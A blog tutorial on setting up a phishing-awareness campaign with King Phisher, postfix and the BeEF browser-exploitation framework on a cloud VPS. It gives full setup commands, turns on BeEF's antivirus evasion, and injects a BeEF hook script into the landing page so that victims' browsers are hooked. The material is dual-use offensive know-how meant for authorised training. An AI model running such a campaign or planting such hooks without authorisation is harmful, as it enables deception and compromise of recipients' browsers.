phishing

Gone KingPhishin’ Part 1 – KingPhisher + BeEF + Digital Ocean + Kali

9226661_orig

!!UPDATED INSTRUCTIONS FOR RELEASE 1.5.1 here !!

Running a phishing campaign against your organisation is a good way to educate users against the perils of the inbox. Some of the common problems with education-based phishing runs of any reasonable size include:

  • The pain of spinning up infrastructure for the campaign
  • Tracking user participation and response
  • The reconfiguration efforts required each time a new set of individuals is targeted

king-phisher takes care of a lot of those problems. Here’s my quick and dirty setup that utilises a $10-per-month VPS service to run the campaign.

Scenario
As mentioned earlier, I’ll be deploying this to a $10/month cloud server on Digital Ocean as a 24/7 service is needed for a proper phishing campaign, and Digital Ocean offers a solid product at the right price. Not necessary, you can host it yourself of course.

To increase the chances of a successful campaign, we’ll be running the king-phisher web server on TCP port 80, and BeEF on TCP port 443 as both HTTP and HTTPS are pretty much guaranteed to be permitted on the outbound route of a normal business network.

Prerequisites

  • A box running Ubuntu 14.10 x64  (this probably works on Debian and a range of other distros, but no guarantees)
  • A standard user configured (via adduser)
  • Remotely accessible SSH server running

Configuring the king-phisher server
So I’ve got my cloud Ubuntu 14.10 x64 virtual machine ready to go, freshly updated/upgraded using the apt package manager. Next step is to install postgresql (we won’t be using sqlite as support is being wound back for king-phisher) along with some other dependencies, and then run the automated installer script. Use sudo or the root account as you see fit:

root@deceptor:~# apt-get install postgresql  python-mpltoolkits.basemap python-mpltoolkits.basemap-data 
Reading package lists… Done
Building dependency tree
Reading state information… Done
The following extra packages will be installed:
postgresql-9.4 postgresql-client-9.4 postgresql-client-common postgresql-common ssl-cert


* Starting PostgreSQL 9.4 database server                                                                                     [OK ] 
Setting up postgresql (9.4+162) …
root@deceptor:~# 
root@deceptor:~# cd /opt && wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && sudo bash ./install.sh
Linux version detected as Ubuntu
Downloading and installing the King Phisher server to /opt/king-phisher
Successfully cloned the git repo
Installing Ubuntu dependencies


root@deceptor:/opt#

This will pull the latest version of king-phisher from SecureState’s GitHub repository, download all the dependencies and install king-phisher in the /opt directory. Go grab some coffee, as there are a number of packages for the installer to pull and configure. It took around 10 minutes.

If you happen to get any pip errors (particularly ImportError: cannot import name IncompleteRead), then you may need to re-install pip via easy_install:

root@deceptor:~# apt-get remove python-pip


root@deceptor:~# easy_install pip
Searching for pip
Reading https://pypi.python.org/simple/pip/


Finished processing dependencies for pip

root@deceptor:~#

…then rerun setup.sh to finish installing the server.

Once it’s complete, you’ll need to configure Postgresql to support your king-phisher instance. Use your favourite editor to add the following line to /etc/postgresql/9.4/main/pg_hba.conf:

host    “king_phisher”  “king_phisher”  127.0.0.1/32            md5

..then configure the Postgresql user account for king_phisher:

root@deceptor:~# su postgres
postgres@deceptor:~# createuser king_phisher -P
Enter password for new role: 
:<yourpassword>
Enter it again: 
:<yourpassword>

postgres@deceptor:~#  createdb –owner=king_phisher king_phisher
postgres@deceptor:~# exit
root@deceptor:~# 

If during the creation you are asked any questions about the role of the king_phisher user, just answer “n” to all of them. Once this is done, you’ll need to update the king-phisher server configuration to use your newly-created Postgresql database by editing /opt/king-phisher/server_config.yml. Comment out the following line:

database: sqlite:////var/king-phisher/king-phisher.db

..then add the following:

database: postgresql://king_phisher:<yourpassword>@localhost/king_phisher

Make sure your indenting is accurate, then restart the Postgresql server. Test to make sure KingPhisherServer starts correctly:

root@deceptor:~# /opt/king-phisher/KingPhisherServer -L INFO -f /opt/king-phisher/server_config.yml 
INFO     listening on 0.0.0.0:80
INFO     0.0.0.0:80 – basic authentication has been enabled
INFO     0.0.0.0:80 – serving files has been enabled
INFO     initializing database connection with driver postgresql
INFO     the job manager has been started
WARNING  the specified geoip database does not exist, downloading a new copy
INFO     Starting new HTTP connection (1): geolite.maxmind.com
INFO     server running in process: 22826 main tid: 0x7ffbb4525740
INFO     dropped privileges to the nobody account

Ok, the king-phisher server is now sorted. Ctrl+C to kill it for now, as it’s time to install BeEF into the /opt directory and configure its dependencies:

root@deceptor:/opt# git clone https://github.com/beefproject/beef.git
Cloning into ‘beef’…
remote: Counting objects: 24769, done.
remote: Total 24769 (delta 0), reused 0 (delta 0), pack-reused 24769
Receiving objects: 100% (24769/24769), 9.69 MiB | 3.73 MiB/s, done.
Resolving deltas: 100% (12811/12811), done.
Checking connectivity… done.
root@deceptor:/opt/beef# apt-get install ruby-all-dev libsqlite3-dev sqlite3 

root@deceptor:/opt# gem install rvm

root@deceptor:/opt# gem install bundler

root@deceptor:/opt# cd beef 

root@deceptor:/opt/beef# ./beef
Could not find gem ‘eventmachine (>= 0) ruby’ in any of the gem sources listed in your Gemfile or available on this machine.
Run `bundle install` to install missing gems.
root@deceptor:/opt/beef# bundle install

root@deceptor:/opt/beef# 

Edit /opt/beef/config.yaml  and change the server port to 443:

# HTTP server
    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: “0.0.0.0”
        port: “443”

…then enable antivirus evasion:

 evasion:
            enable: true

You should also DEFINITELY change the admin password for BeEF – this is also configurable in  /opt/beef/config.yaml. You should now be able to run BeEF:

root@deceptor:/opt/beef# ./beef 
[ 6:45:33][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].
[ 6:45:34][*] Browser Exploitation Framework (BeEF) 0.4.6.0-alpha
[ 6:45:34]    |   Twit: @beefproject
[ 6:45:34]    |   Site: http://beefproject.com
[ 6:45:34]    |   Blog: http://blog.beefproject.com
[ 6:45:34]    |_  Wiki: https://github.com/beefproject/beef/wiki
[ 6:45:34][*] Project Creator: Wade Alcorn (@WadeAlcorn)
[ 6:45:34][*] BeEF is loading. Wait a few seconds…
[ 6:45:39][*] 13 extensions enabled.
[ 6:45:39][*] 240 modules enabled.
[ 6:45:39][*] 3 network interfaces were detected.
[ 6:45:39][+] running on network interface: 127.0.0.1
[ 6:45:39]    |   Hook URL: http://127.0.0.1:443/hook.js
[ 6:45:39]    |_  UI URL:   http://127.0.0.1:443/ui/panel
[ 6:45:39][+] running on network interface: 1.2.3.4
[ 6:45:39]    |   Hook URL: http://1.2.3.4:443/hook.js
[ 6:45:39]    |_  UI URL:   http://1.2.3.4:443/ui/panel
[ 6:45:39][+] running on network interface: 2.3.4.5
[ 6:45:39]    |   Hook URL: http://12.3.4.5:443/hook.js
[ 6:45:39]    |_  UI URL:   http://2.3.4.5:443/ui/panel
[ 6:45:39][*] RESTful API key: 3cxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx8e
[ 6:45:39][*] DNS Server: 127.0.0.1:5300 (udp)
[ 6:45:39]    |   Upstream Server: 8.8.8.8:53 (udp)
[ 6:45:39]    |_  Upstream Server: 8.8.8.8:53 (tcp)
[ 6:45:39][*] HTTP Proxy: http://127.0.0.1:6789
[ 6:45:39][*] BeEF server started (press control+c to stop)

Righto, now we need to configure our mail transport agent. I won’t be using the king-phisher version, not because it’s not great, but just because 🙂 so I’ll configure postfix instead. Swap out myname@mydomain for an appropriate value:

root@deceptor:/opt/beef# apt-get install mailutils postfix

Select Internet Site and pick an appropriate FQDN value. THe sort out the rest of the config:
root@deceptor:/opt/beef# echo “root myname@mydomain.com” > /etc/postfix/generic
root@deceptor:/opt/beef# postmap /etc/postfix/generic
Add an entry to smtp_generic maps and change the inet_interfaces value to 127.0.0.1 in /etc/postfix/main/cf:
inet_interfaces = 127.0.0.1
smtp_generic_maps = hash:/etc/postfix/generic
Restart postfix. Done.
Configuring the KingPhisher client
Configuring the client is pretty straight forward – see the king-phisher install page for a list of known supported platforms/OS. I’ll be using Kali 1.0.8  to run the client.Easiest way to get the client is to carbon copy what we did for the server, and install the extra packages that allow us to use the mapping functionality:
root@kali:~# apt-get install libgeos++-dev libgeos-3.3.3 libgeos-dev python-mpltoolkits.basemap python-mpltoolkits.basemap-data
Reading package lists… Done
Building dependency tree       
Reading state information… Done


root@kali:~# 

root@kali:~# wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && sudo bash ./install.sh
Linux version detected as Kali
Downloading and installing the King Phisher server to /opt/king-phisher


Start the King Phisher server with the following command:
sudo /opt/king-phisher/KingPhisherServer -L INFO -f /opt/king-phisher/server_config.yml

root@kali:~# 

Now you should be able to run the gui client by navigating to /opt/king-phisher and running ./KingPhisher:

 

bb01

Back on your Digital Ocean box, start both the KingPhisher server and BeEF server, then fill in the connection details on your client and click Connect. Create a new campaign by giving it a name and click Select. You’ll now need to start filling in the fields for your campaign. Make sure you fill in all the fields – particularly the source email values. The campaign won’t run without them.

Let’s use the “fake delivery notification” template by setting the Message HTML file to
/opt/king-phisher/data/client/king_phisher/email_templates/purchases.html. This will utilise the fake delivery notification email template which will be sent to our victims.

The document root for KingPhisher’s webserver is specified in the last line /opt/king-phisher/server_config.yaml – the default location is /var/www so we’ll put all our web content there. For this campaign, let’s just symlink the web content for the education package provided by SecureState. Jump back onto your Digital Ocean box and run the following:

root@deceptor:~# ln -s /opt/king-phisher/data/server/king_phisher/education/* /var/www

We will also use one of the SecureState email templates in the next step. Back on your Kali box (or whatever system you’re using to run the KingPhisher client) create a CSV file containing one firstname,lastname,emailaddress per line for each target in VIM/Nano/YourFavourite editor.

Now we should have everything we need to run the campaign:

bb02

The following fields are the most critical:

Web Server Url: This will be the address of your Digital Ocean box, mapped through to /var/www (I’ve obviously added a DNS record for mine here).
Source Email: The fake originating email address.
Message HTML File: Template for the campaign, located on your local system.
Target CSV File: The file containing your targets.

In the Edit tab, you can see how each element is pulled from the KingPhisher configuration and your template file to populate each mail. Once you’re happy with everything, click the Preview tab to see what your phishing email will look like.

SMTP Configuration settings
We need to tell the client how to talk to our postfix mail server. In the client, select Edit>Preferences and click the SMTP Server tab. Ensure the following are set:

– SMTP Server is set to localhost:25
– Tunnel Over SSH is on
– SSH Server Name is your Digital Ocean IP address
– SSH Username is your standard username on your Digital Ocean box

Click Apply when finished. It can take a little while for the GUI to become responsive again, so be patient.

Integrating BeEF hooks
Before we send this one off, we should configure the Beef hook to give us more exploitation options. Once again, under Edit>Preferences of the client you’ll find the BeEF Settings section under the Server tab. Take a look at your running version of BeEF on your Digital Ocean box (or the BeEF config itself) to find the hook URL and include that (something like http://1.2.3.4:443/hook.js) Remember – if you’ve followed this tutorial step by step, the hook should be running on TCP port 443.

You’ll need to make sure your victim(s) run the BeEF hook when they hit the landing page. Edit/var/www/index.html and add the following after the <head> tag:

<script src=”/kp.js” ></script>

Great, now they will be BeEF-hooked when they visit.

Initiate the campaign
Right, you should now be ready to go! In the Configuration tab, click Verify URL to make sure your KingPhisher server is running and that the landing page for your victims is active and reachable. Go to the Send tab and click Start to kick off your campaign. You’ll be asked to authenticate your client to your Digital Ocean box once more, the off go your nasty emails! Now you can sit back and watch the magic via the View Campaign tab or play with your victims via BeEF’s control panel.

I won’t walk you through campaign management and all the cool features that KingPhisher has, including global mapping, activity tracking, etc, suffice to say that it’s a great platform to run your campaigns from and is very easy to use once you’re set up.

Next time
I’ll follow up this post shortly to cover off some more functionality that you will find useful for your phishing campaigns, including:

– Enabling SSL/TLS
– Capturing credentials

Hope this helps! Comments/feedback welcome.

sw1tch

5 Comments

  1. I followed the instructions with no problems until I went to see if KingPhisherServer started correctly by running /opt/king-phisher/KingPhisherServer -L INFO -f /opt/king-phisher/server_config.yml The server didn’t start and my output is as follows:

    root@KingPhish:~# /opt/king-phisher/KingPhisherServer -L INFO -f /opt/king-phisher/server_config.yml
    Traceback (most recent call last):
    File “/opt/king-phisher/KingPhisherServer”, line 42, in
    from king_phisher import color
    File “/opt/king-phisher/king_phisher/__init__.py”, line 33, in
    from . import version
    File “/opt/king-phisher/king_phisher/version.py”, line 37, in
    import smoke_zephyr.utilities
    ImportError: No module named smoke_zephyr.utilities
    root@KingPhish:~#

    Any idea what went wrong?

    1. Looks like you’re missing some packages. Pip normally takes care of the dependencies, so I’d recommend running ‘pip install -r requirements.txt’ from the king-phisher directory to see if that resolves the issue.

Leave a Reply

Your email address will not be published. Required fields are marked *